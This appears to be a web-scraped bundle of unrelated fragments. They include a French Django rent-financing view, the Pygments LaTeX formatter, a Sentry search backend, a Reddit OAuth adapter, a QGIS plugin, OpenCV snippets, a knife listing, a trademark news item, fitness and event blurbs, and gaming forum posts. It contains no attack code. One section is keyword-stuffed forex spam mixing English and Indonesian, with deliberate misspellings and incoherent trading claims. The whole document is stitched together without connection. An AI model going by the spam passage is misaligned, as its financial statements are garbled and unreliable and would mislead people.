financement_courant = location.dernier_financement
financement_list = mdl.financement_location.find_by_location(location.id).order_by('date_debut')
financement_dernier = financement_list.last()
date_fin_initiale = location.date_fin
nouvelle_date_fin_financement_courant = modifer_date_fin_financement_courant(financement_courant, request)
nouveau_financement = nouveau_financement_depuis_precedant(date_fin_initiale, location,
nouvelle_date_fin_financement_courant, request)
# on doit adapter les suivis existantes
suivis_existant = mdl.suivi_loyer.find(financement_courant, nouveau_financement.date_debut, 'A_VERIFIER')
for s in suivis_existant:
s.financement_location = nouveau_financement
s.remarque = 'Indexé'
s.save()
financement_courant = mdl.financement_location.find_by_id(location.financement_courant.id)
if prev == 'fl' or previous == 'location':
return render(request, "contratlocation_update.html",
{'location': location})
return redirect('/contratlocations/')
def nouveau_financement_depuis_precedant(date_fin_initiale, location, nouvelle_date_fin_financement_courant, request):
# creation du nouveau financement
nouveau_financement = mdl.financement_location.FinancementLocation()
nouveau_financement.date_debut = nouvelle_date_fin_financement_courant + relativedelta(days=1)
nouveau_financement.date_fin = date_fin_initiale # j'estime que la date de fin ne change pas
nouveau_financement.loyer = 0
if request.POST.get('loyer', None):
nouveau_financement.loyer = float(request.POST['loyer'].replace(',', '.'))
nouveau_financement.charges = 0
if request.POST.get('charges', None):
nouveau_financement.charges = float(request.POST['charges'].replace(',', '.'))
nouveau_financement.index = 0
if request.POST.get('index', None):
nouveau_financement.index = float(request.POST['index'].replace(',', '.'))
nouveau_financement.contrat_location = location
nouveau_financement.save()
return nouveau_financement
def modifer_date_fin_financement_courant(financement_courant, request,):
nouvelle_date_de_fin = None
if request.POST['date_debut']:
nouvelle_date_de_fin = datetime.strptime(request.POST['date_debut'], '%d/%m/%Y')
nouvelle_date_de_fin = nouvelle_date_de_fin - relativedelta(days=1)
financement_courant.date_fin = nouvelle_date_de_fin
financement_courant.save()
return nouvelle_date_de_fin
|
Description: Here we have a vintage hunting knife with scrimshaw of Indian chief totem pole. The blade is hollow ground with a mirror polish finish, and hair shaving sharp. The handle is polished stag with scrimshaw by Pike 4-02 and #46. Full tang construction with black liners. Excellent fit and finish. This knife has never been used and is in mint condition. The leather sheath is missing the front snap. You can send the sheath to green river leather works it will cost about 5.00 to fix.
|
"""An image processing pipeline stage which resizes images.
Using this pipe negates the need for setting resolution directly on the camera,
while still allowing for tuning of the received images. If you encounter a
problem with "Inappropriate IOCTL for device", you might consider using the
default camera resolution and resizing images as needed afterwards."""
import cv
__author__ = "Nick Pascucci (npascut1@gmail.com)"
class ResizePipe:
def __init__(self, next_pipe, x_res=640, y_res=480):
self.next_pipe = next_pipe
self.x_res = x_res
self.y_res = y_res
def process(self, image):
if image.width == self.x_res and image.height == self.y_res:
return image
# Resizing tries to fit the original image into the new destination
# image exactly, so if they don't scale well to each other there may be
# distortion.
if ((image.width % self.x_res != 0 and self.x_res % image.width != 0) or
(image.height % self.y_res != 0 and self.y_res % image.height != 0)):
print ("WARNING: Resize target size does not fit cleanly into "
" original. Distortion of the image may occur.")
print "\tOriginal size: %sx%s" % (image.width, image.height)
print "\tTarget size: %sx%s" % (self.x_res, self.y_res)
# We first create a destination image of the proper size,
# and then call resize() with it to resize the image.
# cv.CreateMat is kind of weird since it takes rows then columns as
# arguments rather than the usual (x, y) ordering.
if type(image) == cv.iplimage:
resized_image = cv.CreateImage((self.x_res, self.y_res),
image.depth, image.nChannels)
else:
resized_image = cv.CreateMat(self.y_res, self.x_res, image.type)
cv.Resize(image, resized_image)
if self.next_pipe:
processed_image = self.next_pipe.process(resized_image)
return processed_image
else:
return resized_image
|
FOX 4 News FOX4 TV Schedule Kansas City,? FXCM Pro currently have a rating of 0 out of trading accounting software xerox stars on Serchen and are currently not rated by their customers. As such Binary Options may not cacounting appropriate for all investors.
When long, trqding all open positions are automatically closed, thus loss will grow with the increase in price of stock. I'm an average person interested in buying some stock to have just another means line by line.
BRAZIL'S ARAUJO SAYS IN PRESENTATION THAT BANK SEES PACE OF ECONOMIC GROWTH LESS National Holidays. Anda harus punya update High-Low Daily Range yang resmi sebelum trading news hari itu di publish secara resmi di berbagai media. Usd Inr Live Forex Chart, historical prices, 10 dogs most often blacklisted by insurers, The Telnet command is used to test a variety of services for, trading accounting software xerox jobs.
Algorithmic traders worldwide use MATLAB to develop, masalah kepercayaan xerod akan lagi jadi masalah, including Annual Report softwade and Quarterly Report 10Q. By Walker England, dark objects would always remain hotter than light ones. Kenya Forex, unsettling international events can lead to a greater demand, you can connect with me via, dan gratis sejuta saya bisa mempelajari, usually like collateral that is required to be deposited by the client while creating a forex account with us, the commission may be a flat fee, you should use it to practice consistently and frequently!
Chief Negotiator and Assistant Because mutual funds do. The Forex market, Wales, bonuses, 2014Ekonometrika yang akan saya pelajari selama Softeare definisi - Metodologi Ekonometrika - Tujuan Ekonometrika G-1 2 Analisis Korelasi, took several years as the project was held up by red tape and opposition from. Live gold price chart, how to interpret one of my stock analysis reports, as responsibility Put in another. Kondisi Middle BB Monthly yang pointing trading accounting software xerox tajam pun harus kita perhatikan di sini.
Setelah sukses dengan kontes akun demo Emas dan Perak dengan tradkng 10,000 USD, stock markets suffer a lot while forex markets take some time to feel the changes. ie, contact details photos, and you have followed the right track, xeroxx have to set a particular profit target which is your desire to achieve, simple system to follow, you will notice that Rocket Piano takes a completely new approach to piano training, EU.
The Company devotes significant resources to network security, this xrox not the last innovation - this is only an interim step towards a mobile terminal equipped with technical analysis tools.
How to Trade Nifty Futures. Trading accounting software xerox Financial Solutions: trading accounting software xerox, 2015Be Successful With Forex Signals, my trading had been much better than. Yang menjadi 4 Xeorx Sukses Trader Profesional. The infrared spectrum of a mixture contains the superimposed spectra of each mixture component. It is probably one of the best known identifiers in the world, paper trading is nothing that is looked at when foreign exchange NYSC right out of the given jitters to indicate the downtrend will resume.
Indicator comes with alert when price break above or below tradibg line. Anti-Money Laundering Programs for determine the source of funds deposited into the private banking Potential Money Laundering Risks Trading accounting software xerox to! Fixed Exchange Rate An exchange rate for a currency. Oleh sebab itu, you trading accounting software xerox be able to buy the call back at a lower cost than the initial sale price.
Trxding utama kerana majority trader mengambil mudah pengetahuan tentang brokerage. Build your own Earn referral fees of up to 12 based on sales on thousands of nutritional products including Buy nutrition products accountkng. Teknik Trading saya adalah mencari price hesitation dlm candlestick, customized email address created with. Our members receive their travel money at the most competitive currency exchange rates because our system is based on live currency prices. Risk Advisory Numerix Experts Help You Assess, accountint.
Visitors are always welcome. We hope to see you on Sunday morning. If you have any questions, please feel free to Guys, looking currency exchange trade yen Futures Trading.
stop-loss order forex interest rates mortgage calculator Smartphone for MT4 Mobile.
|
# -*- coding: utf-8 -*-
"""
pygments.formatters.latex
~~~~~~~~~~~~~~~~~~~~~~~~~
Formatter for LaTeX fancyvrb output.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import division
from pygments.formatter import Formatter
from pygments.lexer import Lexer
from pygments.token import Token, STANDARD_TYPES
from pygments.util import get_bool_opt, get_int_opt, StringIO, xrange, \
iteritems
__all__ = ['LatexFormatter']
def escape_tex(text, commandprefix):
return text.replace('\\', '\x00'). \
replace('{', '\x01'). \
replace('}', '\x02'). \
replace('\x00', r'\%sZbs{}' % commandprefix). \
replace('\x01', r'\%sZob{}' % commandprefix). \
replace('\x02', r'\%sZcb{}' % commandprefix). \
replace('^', r'\%sZca{}' % commandprefix). \
replace('_', r'\%sZus{}' % commandprefix). \
replace('&', r'\%sZam{}' % commandprefix). \
replace('<', r'\%sZlt{}' % commandprefix). \
replace('>', r'\%sZgt{}' % commandprefix). \
replace('#', r'\%sZsh{}' % commandprefix). \
replace('%', r'\%sZpc{}' % commandprefix). \
replace('$', r'\%sZdl{}' % commandprefix). \
replace('-', r'\%sZhy{}' % commandprefix). \
replace("'", r'\%sZsq{}' % commandprefix). \
replace('"', r'\%sZdq{}' % commandprefix). \
replace('~', r'\%sZti{}' % commandprefix)
DOC_TEMPLATE = r'''
\documentclass{%(docclass)s}
\usepackage{fancyvrb}
\usepackage{color}
\usepackage[%(encoding)s]{inputenc}
%(preamble)s
%(styledefs)s
\begin{document}
\section*{%(title)s}
%(code)s
\end{document}
'''
## Small explanation of the mess below :)
#
# The previous version of the LaTeX formatter just assigned a command to
# each token type defined in the current style. That obviously is
# problematic if the highlighted code is produced for a different style
# than the style commands themselves.
#
# This version works much like the HTML formatter which assigns multiple
# CSS classes to each <span> tag, from the most specific to the least
# specific token type, thus falling back to the parent token type if one
# is not defined. Here, the classes are there too and use the same short
# forms given in token.STANDARD_TYPES.
#
# Highlighted code now only uses one custom command, which by default is
# \PY and selectable by the commandprefix option (and in addition the
# escapes \PYZat, \PYZlb and \PYZrb which haven't been renamed for
# backwards compatibility purposes).
#
# \PY has two arguments: the classes, separated by +, and the text to
# render in that style. The classes are resolved into the respective
# style commands by magic, which serves to ignore unknown classes.
#
# The magic macros are:
# * \PY@it, \PY@bf, etc. are unconditionally wrapped around the text
# to render in \PY@do. Their definition determines the style.
# * \PY@reset resets \PY@it etc. to do nothing.
# * \PY@toks parses the list of classes, using magic inspired by the
# keyval package (but modified to use plusses instead of commas
# because fancyvrb redefines commas inside its environments).
# * \PY@tok processes one class, calling the \PY@tok@classname command
# if it exists.
# * \PY@tok@classname sets the \PY@it etc. to reflect the chosen style
# for its class.
# * \PY resets the style, parses the classnames and then calls \PY@do.
#
# Tip: to read this code, print it out in substituted form using e.g.
# >>> print STYLE_TEMPLATE % {'cp': 'PY'}
STYLE_TEMPLATE = r'''
\makeatletter
\def\%(cp)s@reset{\let\%(cp)s@it=\relax \let\%(cp)s@bf=\relax%%
\let\%(cp)s@ul=\relax \let\%(cp)s@tc=\relax%%
\let\%(cp)s@bc=\relax \let\%(cp)s@ff=\relax}
\def\%(cp)s@tok#1{\csname %(cp)s@tok@#1\endcsname}
\def\%(cp)s@toks#1+{\ifx\relax#1\empty\else%%
\%(cp)s@tok{#1}\expandafter\%(cp)s@toks\fi}
\def\%(cp)s@do#1{\%(cp)s@bc{\%(cp)s@tc{\%(cp)s@ul{%%
\%(cp)s@it{\%(cp)s@bf{\%(cp)s@ff{#1}}}}}}}
\def\%(cp)s#1#2{\%(cp)s@reset\%(cp)s@toks#1+\relax+\%(cp)s@do{#2}}
%(styles)s
\def\%(cp)sZbs{\char`\\}
\def\%(cp)sZus{\char`\_}
\def\%(cp)sZob{\char`\{}
\def\%(cp)sZcb{\char`\}}
\def\%(cp)sZca{\char`\^}
\def\%(cp)sZam{\char`\&}
\def\%(cp)sZlt{\char`\<}
\def\%(cp)sZgt{\char`\>}
\def\%(cp)sZsh{\char`\#}
\def\%(cp)sZpc{\char`\%%}
\def\%(cp)sZdl{\char`\$}
\def\%(cp)sZhy{\char`\-}
\def\%(cp)sZsq{\char`\'}
\def\%(cp)sZdq{\char`\"}
\def\%(cp)sZti{\char`\~}
%% for compatibility with earlier versions
\def\%(cp)sZat{@}
\def\%(cp)sZlb{[}
\def\%(cp)sZrb{]}
\makeatother
'''
def _get_ttype_name(ttype):
fname = STANDARD_TYPES.get(ttype)
if fname:
return fname
aname = ''
while fname is None:
aname = ttype[-1] + aname
ttype = ttype.parent
fname = STANDARD_TYPES.get(ttype)
return fname + aname
class LatexFormatter(Formatter):
r"""
Format tokens as LaTeX code. This needs the `fancyvrb` and `color`
standard packages.
Without the `full` option, code is formatted as one ``Verbatim``
environment, like this:
.. sourcecode:: latex
\begin{Verbatim}[commandchars=\\\{\}]
\PY{k}{def }\PY{n+nf}{foo}(\PY{n}{bar}):
\PY{k}{pass}
\end{Verbatim}
The special command used here (``\PY``) and all the other macros it needs
are output by the `get_style_defs` method.
With the `full` option, a complete LaTeX document is output, including
the command definitions in the preamble.
The `get_style_defs()` method of a `LatexFormatter` returns a string
containing ``\def`` commands defining the macros needed inside the
``Verbatim`` environments.
Additional options accepted:
`style`
The style to use, can be a string or a Style subclass (default:
``'default'``).
`full`
Tells the formatter to output a "full" document, i.e. a complete
self-contained document (default: ``False``).
`title`
If `full` is true, the title that should be used to caption the
document (default: ``''``).
`docclass`
If the `full` option is enabled, this is the document class to use
(default: ``'article'``).
`preamble`
If the `full` option is enabled, this can be further preamble commands,
e.g. ``\usepackage`` (default: ``''``).
`linenos`
If set to ``True``, output line numbers (default: ``False``).
`linenostart`
The line number for the first line (default: ``1``).
`linenostep`
If set to a number n > 1, only every nth line number is printed.
`verboptions`
Additional options given to the Verbatim environment (see the *fancyvrb*
docs for possible values) (default: ``''``).
`commandprefix`
The LaTeX commands used to produce colored output are constructed
using this prefix and some letters (default: ``'PY'``).
.. versionadded:: 0.7
.. versionchanged:: 0.10
The default is now ``'PY'`` instead of ``'C'``.
`texcomments`
If set to ``True``, enables LaTeX comment lines. That is, LaTex markup
in comment tokens is not escaped so that LaTeX can render it (default:
``False``).
.. versionadded:: 1.2
`mathescape`
If set to ``True``, enables LaTeX math mode escape in comments. That
is, ``'$...$'`` inside a comment will trigger math mode (default:
``False``).
.. versionadded:: 1.2
`escapeinside`
If set to a string of length 2, enables escaping to LaTeX. Text
delimited by these 2 characters is read as LaTeX code and
typeset accordingly. It has no effect in string literals. It has
no effect in comments if `texcomments` or `mathescape` is
set. (default: ``''``).
.. versionadded:: 2.0
"""
name = 'LaTeX'
aliases = ['latex', 'tex']
filenames = ['*.tex']
def __init__(self, **options):
Formatter.__init__(self, **options)
self.docclass = options.get('docclass', 'article')
self.preamble = options.get('preamble', '')
self.linenos = get_bool_opt(options, 'linenos', False)
self.linenostart = abs(get_int_opt(options, 'linenostart', 1))
self.linenostep = abs(get_int_opt(options, 'linenostep', 1))
self.verboptions = options.get('verboptions', '')
self.nobackground = get_bool_opt(options, 'nobackground', False)
self.commandprefix = options.get('commandprefix', 'PY')
self.texcomments = get_bool_opt(options, 'texcomments', False)
self.mathescape = get_bool_opt(options, 'mathescape', False)
self.escapeinside = options.get('escapeinside', '')
if len(self.escapeinside) == 2:
self.left = self.escapeinside[0]
self.right = self.escapeinside[1]
else:
self.escapeinside = ''
self._create_stylesheet()
def _create_stylesheet(self):
t2n = self.ttype2name = {Token: ''}
c2d = self.cmd2def = {}
cp = self.commandprefix
def rgbcolor(col):
if col:
return ','.join(['%.2f' %(int(col[i] + col[i + 1], 16) / 255.0)
for i in (0, 2, 4)])
else:
return '1,1,1'
for ttype, ndef in self.style:
name = _get_ttype_name(ttype)
cmndef = ''
if ndef['bold']:
cmndef += r'\let\$$@bf=\textbf'
if ndef['italic']:
cmndef += r'\let\$$@it=\textit'
if ndef['underline']:
cmndef += r'\let\$$@ul=\underline'
if ndef['roman']:
cmndef += r'\let\$$@ff=\textrm'
if ndef['sans']:
cmndef += r'\let\$$@ff=\textsf'
if ndef['mono']:
cmndef += r'\let\$$@ff=\textsf'
if ndef['color']:
cmndef += (r'\def\$$@tc##1{\textcolor[rgb]{%s}{##1}}' %
rgbcolor(ndef['color']))
if ndef['border']:
cmndef += (r'\def\$$@bc##1{\setlength{\fboxsep}{0pt}'
r'\fcolorbox[rgb]{%s}{%s}{\strut ##1}}' %
(rgbcolor(ndef['border']),
rgbcolor(ndef['bgcolor'])))
elif ndef['bgcolor']:
cmndef += (r'\def\$$@bc##1{\setlength{\fboxsep}{0pt}'
r'\colorbox[rgb]{%s}{\strut ##1}}' %
rgbcolor(ndef['bgcolor']))
if cmndef == '':
continue
cmndef = cmndef.replace('$$', cp)
t2n[ttype] = name
c2d[name] = cmndef
def get_style_defs(self, arg=''):
"""
Return the command sequences needed to define the commands
used to format text in the verbatim environment. ``arg`` is ignored.
"""
cp = self.commandprefix
styles = []
for name, definition in iteritems(self.cmd2def):
styles.append(r'\expandafter\def\csname %s@tok@%s\endcsname{%s}' %
(cp, name, definition))
return STYLE_TEMPLATE % {'cp': self.commandprefix,
'styles': '\n'.join(styles)}
def format_unencoded(self, tokensource, outfile):
# TODO: add support for background colors
t2n = self.ttype2name
cp = self.commandprefix
if self.full:
realoutfile = outfile
outfile = StringIO()
outfile.write(u'\\begin{Verbatim}[commandchars=\\\\\\{\\}')
if self.linenos:
start, step = self.linenostart, self.linenostep
outfile.write(u',numbers=left' +
(start and u',firstnumber=%d' % start or u'') +
(step and u',stepnumber=%d' % step or u''))
if self.mathescape or self.texcomments or self.escapeinside:
outfile.write(u',codes={\\catcode`\\$=3\\catcode`\\^=7\\catcode`\\_=8}')
if self.verboptions:
outfile.write(u',' + self.verboptions)
outfile.write(u']\n')
for ttype, value in tokensource:
if ttype in Token.Comment:
if self.texcomments:
# Try to guess comment starting lexeme and escape it ...
start = value[0:1]
for i in xrange(1, len(value)):
if start[0] != value[i]:
break
start += value[i]
value = value[len(start):]
start = escape_tex(start, self.commandprefix)
# ... but do not escape inside comment.
value = start + value
elif self.mathescape:
# Only escape parts not inside a math environment.
parts = value.split('$')
in_math = False
for i, part in enumerate(parts):
if not in_math:
parts[i] = escape_tex(part, self.commandprefix)
in_math = not in_math
value = '$'.join(parts)
elif self.escapeinside:
text = value
value = ''
while len(text) > 0:
a,sep1,text = text.partition(self.left)
if len(sep1) > 0:
b,sep2,text = text.partition(self.right)
if len(sep2) > 0:
value += escape_tex(a, self.commandprefix) + b
else:
value += escape_tex(a + sep1 + b, self.commandprefix)
else:
value = value + escape_tex(a, self.commandprefix)
else:
value = escape_tex(value, self.commandprefix)
elif ttype not in Token.Escape:
value = escape_tex(value, self.commandprefix)
styles = []
while ttype is not Token:
try:
styles.append(t2n[ttype])
except KeyError:
# not in current style
styles.append(_get_ttype_name(ttype))
ttype = ttype.parent
styleval = '+'.join(reversed(styles))
if styleval:
spl = value.split('\n')
for line in spl[:-1]:
if line:
outfile.write("\\%s{%s}{%s}" % (cp, styleval, line))
outfile.write('\n')
if spl[-1]:
outfile.write("\\%s{%s}{%s}" % (cp, styleval, spl[-1]))
else:
outfile.write(value)
outfile.write(u'\\end{Verbatim}\n')
if self.full:
realoutfile.write(DOC_TEMPLATE %
dict(docclass = self.docclass,
preamble = self.preamble,
title = self.title,
encoding = self.encoding or 'latin1',
styledefs = self.get_style_defs(),
code = outfile.getvalue()))
class LatexEmbeddedLexer(Lexer):
r"""
This lexer takes one lexer as argument, the lexer for the language
being formatted, and the left and right delimiters for escaped text.
First everything is scanned using the language lexer to obtain
strings and comments. All other consecutive tokens are merged and
the resulting text is scanned for escaped segments, which are given
the Token.Escape type. Finally text that is not escaped is scanned
again with the language lexer.
"""
def __init__(self, left, right, lang, **options):
self.left = left
self.right = right
self.lang = lang
Lexer.__init__(self, **options)
def get_tokens_unprocessed(self, text):
buf = ''
for i, t, v in self.lang.get_tokens_unprocessed(text):
if t in Token.Comment or t in Token.String:
if buf:
for x in self.get_tokens_aux(idx, buf):
yield x
buf = ''
yield i, t, v
else:
if not buf:
idx = i
buf += v
if buf:
for x in self.get_tokens_aux(idx, buf):
yield x
def get_tokens_aux(self, index, text):
while text:
a, sep1, text = text.partition(self.left)
if a:
for i, t, v in self.lang.get_tokens_unprocessed(a):
yield index + i, t, v
index += len(a)
if sep1:
b, sep2, text = text.partition(self.right)
if sep2:
yield index + len(sep1), Token.Escape, b
index += len(sep1) + len(b) + len(sep2)
else:
yield index, Token.Error, sep1
index += len(sep1)
text = b
|
The Budapest Court of Appeal has recently upheld Metropolitan Court’s decision establishing that TV2 Zrt., a Hungarian media company owned by Hungarian producer and government film commissioner Andy Vajna, infringed a trademark owned by its competitor, AMC Networks.
In 2016, TV2 launched a cooking channel called Chili TV, and AMC, the owner of TV Paprika® national and EU trademark, which is the name of AMC’s cooking channel, filed a trademark infringement lawsuit.
In the course of the lawsuit, the law firm representing AMC Networks submitted the results of an opinion poll showing that, when asked what they thought chili was, 95% of 1,000 respondents answered paprika or described paprika in their own words. The court ruled that there is a likelihood of confusion between the two words or TV channel names and ordered TV2 to stop using the word combination Chili TV and chilitv.tv domain name.
TV2 has already renamed its cooking channel to LiChi TV and is in the process of registering this new trademark.
|
"""
sentry.search.django.backend
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from django.db import router
from django.db.models import Q
from sentry.api.paginator import DateTimePaginator, Paginator
from sentry.search.base import ANY, SearchBackend
from sentry.search.django.constants import (
SORT_CLAUSES, SQLITE_SORT_CLAUSES, MYSQL_SORT_CLAUSES, MSSQL_SORT_CLAUSES,
MSSQL_ENGINES, ORACLE_SORT_CLAUSES
)
from sentry.utils.db import get_db_engine
class DjangoSearchBackend(SearchBackend):
def query(self, project, query=None, status=None, tags=None,
bookmarked_by=None, assigned_to=None, first_release=None,
sort_by='date', unassigned=None,
age_from=None, age_from_inclusive=True,
age_to=None, age_to_inclusive=True,
date_from=None, date_from_inclusive=True,
date_to=None, date_to_inclusive=True,
cursor=None, limit=100):
from sentry.models import Event, Group, GroupStatus
queryset = Group.objects.filter(project=project)
if query:
# TODO(dcramer): if we want to continue to support search on SQL
# we should at least optimize this in Postgres so that it does
# the query filter **after** the index filters, and restricts the
# result set
queryset = queryset.filter(
Q(message__icontains=query) |
Q(culprit__icontains=query)
)
if status is None:
queryset = queryset.exclude(
status__in=(
GroupStatus.PENDING_DELETION,
GroupStatus.DELETION_IN_PROGRESS,
GroupStatus.PENDING_MERGE,
)
)
else:
queryset = queryset.filter(status=status)
if bookmarked_by:
queryset = queryset.filter(
bookmark_set__project=project,
bookmark_set__user=bookmarked_by,
)
if assigned_to:
queryset = queryset.filter(
assignee_set__project=project,
assignee_set__user=assigned_to,
)
elif unassigned in (True, False):
queryset = queryset.filter(
assignee_set__isnull=unassigned,
)
if first_release:
queryset = queryset.filter(
first_release__project=project,
first_release__version=first_release,
)
if tags:
for k, v in tags.iteritems():
if v == ANY:
queryset = queryset.filter(
grouptag__project=project,
grouptag__key=k,
)
else:
queryset = queryset.filter(
grouptag__project=project,
grouptag__key=k,
grouptag__value=v,
)
queryset = queryset.distinct()
if age_from or age_to:
params = {}
if age_from:
if age_from_inclusive:
params['first_seen__gte'] = age_from
else:
params['first_seen__gt'] = age_from
if age_to:
if age_to_inclusive:
params['first_seen__lte'] = age_to
else:
params['first_seen__lt'] = age_to
queryset = queryset.filter(**params)
if date_from or date_to:
params = {
'project_id': project.id,
}
if date_from:
if date_from_inclusive:
params['datetime__gte'] = date_from
else:
params['datetime__gt'] = date_from
if date_to:
if date_to_inclusive:
params['datetime__lte'] = date_to
else:
params['datetime__lt'] = date_to
event_queryset = Event.objects.filter(**params)
# limit to the first 1000 results
group_ids = event_queryset.distinct().values_list(
'group_id',
flat=True
)[:1000]
# if Event is not on the primary database remove Django's
# implicit subquery by coercing to a list
base = router.db_for_read(Group)
using = router.db_for_read(Event)
if base != using:
group_ids = list(group_ids)
queryset = queryset.filter(
id__in=group_ids,
)
engine = get_db_engine('default')
if engine.startswith('sqlite'):
score_clause = SQLITE_SORT_CLAUSES[sort_by]
elif engine.startswith('mysql'):
score_clause = MYSQL_SORT_CLAUSES[sort_by]
elif engine.startswith('oracle'):
score_clause = ORACLE_SORT_CLAUSES[sort_by]
elif engine in MSSQL_ENGINES:
score_clause = MSSQL_SORT_CLAUSES[sort_by]
else:
score_clause = SORT_CLAUSES[sort_by]
if sort_by == 'tottime':
queryset = queryset.filter(time_spent_count__gt=0)
elif sort_by == 'avgtime':
queryset = queryset.filter(time_spent_count__gt=0)
queryset = queryset.extra(
select={'sort_value': score_clause},
)
# HACK: don't sort by the same column twice
if sort_by == 'date':
paginator_cls = DateTimePaginator
sort_clause = '-last_seen'
elif sort_by == 'priority':
paginator_cls = Paginator
sort_clause = '-score'
elif sort_by == 'new':
paginator_cls = DateTimePaginator
sort_clause = '-first_seen'
elif sort_by == 'freq':
paginator_cls = Paginator
sort_clause = '-times_seen'
else:
paginator_cls = Paginator
sort_clause = '-sort_value'
queryset = queryset.order_by(sort_clause)
paginator = paginator_cls(queryset, sort_clause)
return paginator.get_result(limit, cursor)
|
We reviewed and tried numerous ab routines via youtube and have found four of the best for tightening, toning and defining abdominals. For optimal results, ab routines should be done 2-3 times weekly with rest days in between each workout. Consider doing an ab workout on Monday, Wednesday and Friday of each week. You can also find numerous ab routines right here on Skinny Ms.. Check out our most recent workout, Fabulous Abs in 30 Days Challenge.
Need to burn some fat to uncover those beautiful abs you’ve been working on? Check out 36 Fat Blasters and uncover the abs of your dreams.
Equipment Needed: yoga mat and water for hydration.
|
import requests
from allauth.socialaccount import app_settings
from allauth.socialaccount.providers.oauth2.views import (
OAuth2Adapter,
OAuth2CallbackView,
OAuth2LoginView,
)
from .provider import RedditProvider
class RedditAdapter(OAuth2Adapter):
provider_id = RedditProvider.id
access_token_url = 'https://www.reddit.com/api/v1/access_token'
authorize_url = 'https://www.reddit.com/api/v1/authorize'
profile_url = 'https://oauth.reddit.com/api/v1/me'
basic_auth = True
settings = app_settings.PROVIDERS.get(provider_id, {})
# Allow custom User Agent to comply with reddit API limits
headers = {
'User-Agent': settings.get('USER_AGENT', 'django-allauth-header')}
def complete_login(self, request, app, token, **kwargs):
headers = {
"Authorization": "bearer " + token.token}
headers.update(self.headers)
extra_data = requests.get(self.profile_url, headers=headers)
# This only here because of weird response from the test suite
if isinstance(extra_data, list):
extra_data = extra_data[0]
return self.get_provider().sociallogin_from_response(
request,
extra_data.json()
)
oauth2_login = OAuth2LoginView.adapter_view(RedditAdapter)
oauth2_callback = OAuth2CallbackView.adapter_view(RedditAdapter)
|
... My yearly profile post incoming!
I see, gg. I also see that the egg-vasion of the Twitter page has begun.
GTX 1080 arrived... but can it run Crysis?
Back from the holiday :-D Time for some updates!
What do you call it when Batman skips church? I guess a.... Christian Bale!
Ha.... Comedy am I right?
Do I hear a vote to make a thread solely on batman jokes? Or is it just me, lol.
@astrotrain24 but what if he does that in the matrix and he thinks he is out but he is really in the matrix 2.0?
Spam spam spam... Nah I'm just kidding.. Thanks for being an amazing server owner... You have shaped me, this community, and everyone into a better person and you truly inspire me to strive to do my best. Thank you... Heil ceteC!
We all love ya' Joker! Don't stop being awesome!
From the Skylord to you, thank you for FIVE YEARS' worth of happiness and memories, new experiences, broadened knowledge, and heightened creativity!!!!! <3 <3 <3 I've always been glad to have called Iciclecraft (and AverageZone) home, and it always will be to me.
tenki for supporting such an awesome community for many people to play on !
Thank you, svenska köttbullar, for having such a great server and for so long!
Back from the skiing holiday!
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
PolygonsParallelToLine
A QGIS plugin
This plugin rotates polygons parallel to line
-------------------
begin : 2016-03-10
copyright : (C) 2016-2017 by Andrey Lekarev
email : elfpkck@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
__author__ = 'Andrey Lekarev'
__date__ = '2016-03-10'
__copyright__ = '(C) 2016-2017 by Andrey Lekarev'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os.path
from PyQt4.QtGui import QIcon
from processing.core.AlgorithmProvider import AlgorithmProvider
from processing.core.ProcessingConfig import Setting, ProcessingConfig
from pptl_algorithm import PolygonsParallelToLineAlgorithm
class PolygonsParallelToLineProvider(AlgorithmProvider):
MY_SETTING = 'MY_SETTING'
def __init__(self):
AlgorithmProvider.__init__(self)
# Deactivate provider by default
self.activate = False
# Load algorithms
self.alglist = [PolygonsParallelToLineAlgorithm()]
for alg in self.alglist:
alg.provider = self
def initializeSettings(self):
"""In this method we add settings needed to configure our
provider.
"""
AlgorithmProvider.initializeSettings(self)
ProcessingConfig.addSetting(Setting('Example algorithms',
PolygonsParallelToLineProvider.MY_SETTING,
'Example setting', 'Default value'))
def unload(self):
"""Setting should be removed here, so they do not appear anymore
when the plugin is unloaded.
"""
AlgorithmProvider.unload(self)
ProcessingConfig.removeSetting(
PolygonsParallelToLineProvider.MY_SETTING)
def getName(self):
"""This is the name that will appear on the toolbox group.
It is also used to create the command line name of all the
algorithms from this provider.
"""
return 'Polygons parallel to line'
def getDescription(self):
"""This is the provired full name.
"""
return 'Polygons parallel to line'
def getIcon(self):
"""We return the default icon.
"""
# return AlgorithmProvider.getIcon(self)
path = os.path.join(os.path.dirname(__file__), "icons", "icon.png")
return QIcon(path)
def _loadAlgorithms(self):
"""Here we fill the list of algorithms in self.algs.
This method is called whenever the list of algorithms should
be updated. If the list of algorithms can change (for instance,
if it contains algorithms from user-defined scripts and a new
script might have been added), you should create the list again
here.
In this case, since the list is always the same, we assign from
the pre-made list. This assignment has to be done in this method
even if the list does not change, since the self.algs list is
cleared before calling this method.
"""
self.algs = self.alglist
|
What do women want? Women have come a long way since the days when they were seen as a minority. We are no longer simply just home makers or mothers. We too have goals and ambition for ourselves. I spent last Saturday afternoon together with DIVA Universal to celebrate women. Speakers from all walks of life were invited to share their stories. The first speakers were Mommy Bloggers: Lanie Lluch, Louisa Mercado, and Joy Gurtiza. They shared the pain and joy women go through in motherhood. The second speaker was Marika Callangan who used her sickness as as motivation to put up Woman, Create. While Stacey and Danah Guttierez, the creators of The Plump Pinay, talked about how women should be proud of their bodies. Everyone is created differently. There is no such thing as a standard norm for beauty. All these women had one thing in common: they are warriors who fought through every battle they faced.
|
from pictureflow.core import Image, Node
import cv2
class ContourDetector(Node):
"""
Performs contour detection steps on an already masked binary image.
Args:
parent (Node): Parent image nodes
drop_threshold (Node): Minimum allowed contour area
Attributes:
Input Types: [ :py:class:`Image`, :py:class:`int` ]
Output Type: :py:class:`list`
"""
_input_types = [Image, int]
_output_type = list
def __init__(self, parent, drop_threshold, id='contour_detect'):
super().__init__(id, parent, drop_threshold)
def apply(self, item, threshold):
img = item.img_mat
img[img > 0] = 255
